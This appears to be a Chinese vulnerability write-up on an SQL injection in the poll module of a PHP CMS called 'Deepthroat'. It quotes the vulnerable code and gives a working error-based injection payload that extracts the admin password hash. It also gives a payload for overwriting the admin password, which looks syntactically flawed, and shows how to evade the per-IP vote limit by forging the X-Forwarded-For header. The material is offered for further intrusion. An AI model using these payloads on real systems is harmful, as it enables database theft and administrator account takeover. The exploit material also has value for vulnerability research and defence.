（PS：这CMS的名字令人遐想)
http://www.shenhoulong.com/ 隶属公司http://company.loooe.com/
 
/Deepthroat/content/poll/ -> index.php
if ($request['vtype']=='a')
57 {
58 $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice']);
59
60 $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']);
61
62 echo 'alert("投票成功！");window.location.href="'.$url.'";';
63 }
64 elseif ($request['vtype']=='b')
65 {
66 for ($i=0;$i
67 {
68 $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice'][$i]);
69 }
70 $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']);
71
72 echo 'alert("投票成功");window.location.href="'.$url.'";';
73 }
74 }
 
 
投票处选项ID 参数choice没有做过滤就带入数据库查询导致注入漏洞的产生
UPDATE注射 唯有用显错注射
投票时抓包 choice参数改成SQL语句
 
POC:
 
and (select 1 from (select count(*),concat((select ((select pwd from shl_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
 
QQ截图20140112191109.jpg
 
 
密码很变态
 
加密函数：/Deepthroat/inc/ -> class.shlencryption.php
 
 
3 {
4 var $enstr = null;
5 function shlEncryption($str)
6 {
7 $this->enstr = $str;
8 }
9 function get_shal()
10 {
11 return sha1($this->enstr);
12 }
13 function get_md5()
14 {
15 return md5($this->enstr);
16 }
17 function get_jxqy3()
18 {
19 $tmpMS = $this->get_shal().$this->get_md5();
20 $tmpNewStr = substr($tmpMS,0,9).'s'.substr($tmpMS,10,9).'h'.substr($tmpMS,20,9).'l'.substr($tmpMS,30,9).'s'.substr($tmpMS,40,9).'u'.substr($tmpMS,50,9).'n'.substr
21 ($tmpMS,60,9).'y'.substr($tmpMS,70,2);
22 $tmpNewStr = substr($tmpNewStr,-36).substr($tmpNewStr,0,36);
23 $tmpNewStr = substr($tmpNewStr,0,70);
24 $tmpNewStr = substr($tmpNewStr,0,14).'j'.substr($tmpNewStr,14,14).'x'.substr($tmpNewStr,28,14).'q'.substr($tmpNewStr,32,14).'y'.substr($tmpNewStr,56,14).'3';
25 return $tmpNewStr;
26 }
27 function to_string()
28 {
29 $tmpstr = $this->get_jxqy3();
30 $tmpstr = substr($tmpstr,-35).substr($tmpstr,0,40);
31 return $tmpstr;
32 }
33 }
34 ?>
 
 
 
SHA1加密的值加上MD5加密的值 然后各种substr HASH基本不能逆了
 
运气好的可以去UPDATE一下密码
把密码update成admin：
 
and (select 1 from (select count(*),concat((select ((update pwd = '33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj' where username='admin')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
 
 
虽然密码解密不了 但还可以基于SQL注射进行下一步渗透
可投票时候做了限制 只允许一个IP投票一次 也就代表一个IP只能执行一次SQL注射语句
这对于进一步的渗透是很麻烦
 
 
 /Deepthroat/content/poll/ -> index.php
if(!empty($request['vtype'])&&!empty($request['choice']))
33 {
34 $sql="SELECT * FROM ".TB_PREFIX."poll_category WHERE id=".$params['args'];
35 $poll_client=$db->get_row($sql);
36 $cur_ip=getip();
37 if(empty($poll_client->client_ip))
38 {
39 $insert_ip=$cur_ip;
40 }
41 else
42 {
43 $checkIP=split(';',$poll_client->client_ip);
44 if(in_array($cur_ip,$checkIP))
45 {
46 echo "alert('您已经投过票了!');window.history.go(-1);";
47 exit;
48 }
49 array_push($checkIP,$cur_ip);
50 $insert_ip=implode(';',$checkIP);
51 }
 
 
看看getip()函数
 
 
/Deepthroat/inc/function.php -> line 347  function getip()  348 {  349 if(getenv('HTTP_CLIENT_IP'))  350 {  351 $client_ip = getenv('HTTP_CLIENT_IP');  352 }  353 elseif(getenv('HTTP_X_FORWARDED_FOR'))  354 {  355 $client_ip = getenv('HTTP_X_FORWARDED_FOR');  356 }  357 elseif(getenv('REMOTE_ADDR'))  358 {  359 $client_ip = getenv('REMOTE_ADDR');  360 }  361 else  362 {  363 $client_ip = $HTTP_SERVER_VAR['REMOTE_ADDR'];  364 }  365 return ip2long($client_ip);  那么利用X-FORWARDED-FOR可以伪造 从而突破限制  X-FORWARDED-FOR: 8.8.8.8